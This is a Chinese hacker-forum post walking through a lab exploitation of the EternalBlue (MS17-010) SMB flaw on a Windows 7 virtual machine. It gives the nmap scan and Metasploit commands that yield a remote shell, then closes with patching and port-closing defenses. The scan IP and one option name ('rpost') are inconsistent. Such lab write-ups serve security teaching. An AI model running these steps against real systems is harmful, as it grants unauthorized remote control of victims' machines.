• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

利用永恒之蓝漏洞(ms17_010)渗透攻击windows


Xdong

Recommended Posts

渗透之路,路漫漫其修远兮。

实验环境:

两台虚拟机:

  攻击机kali:192.168.31.182

  靶机windows7 : 192.168.31.235

工具:metasploit、nmap

注:两台虚拟机需要在同一局域网下。为了能顺利完成本实验,首先要保证两台机子能相互ping通。建议两台虚拟机网络适配器都设成桥接模式。

第一步:扫描目标机器

 nmap -sV -p 0-65535 192.168.31.65

1422914-20200430161137426-463663211.png

可以看到靶机的445端口处于开启状态。

注:靶机扫描既可以在kali命令窗口扫描,也可以在启动metasploit控制台后,在metasploit控制扫描。

 

第二步:启动Metasploit控制台

msfconsole 

1422914-20200430161453943-618209808.png

 

 

第三步:使用ms17_010漏洞

use exploit/windows/smb/ms17_010_eternalblue

1422914-20200430163146898-1827618596.png

 第四步:查看漏洞配置

 show options 

1422914-20200430163433653-1644550926.png

第五步:设置攻击目标的ip和端口

set rhost 192.168.31.235

set rpost  445

 

1422914-20200430163846554-1101391618.png

第六步:渗透攻击

run

1422914-20200430164454072-782641144.png

 

  到此,渗透成功,成功的从远程系统上拿到Windows命令行的Shell。可以在shell界面输入systeminfo测试。

1422914-20200430171853559-1459856419.png

目标回显的信息呈现中文乱码,kali终端字体默认是UTF-8,将其改为gb2312就行了。

 

防御方法:

      渗透的目的不是为了攻击,而是为了更好的防御。

     1、习惯性的做好数据备份。不要等被攻击了才想着备份。

     2、及时的更新补丁。

     3、使用360“NSA武器库免疫工具”进行修护

     4、永恒之蓝主要攻击445端口、139端口。如不需要请关闭这些端口。禁用SMB服务

 

 

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now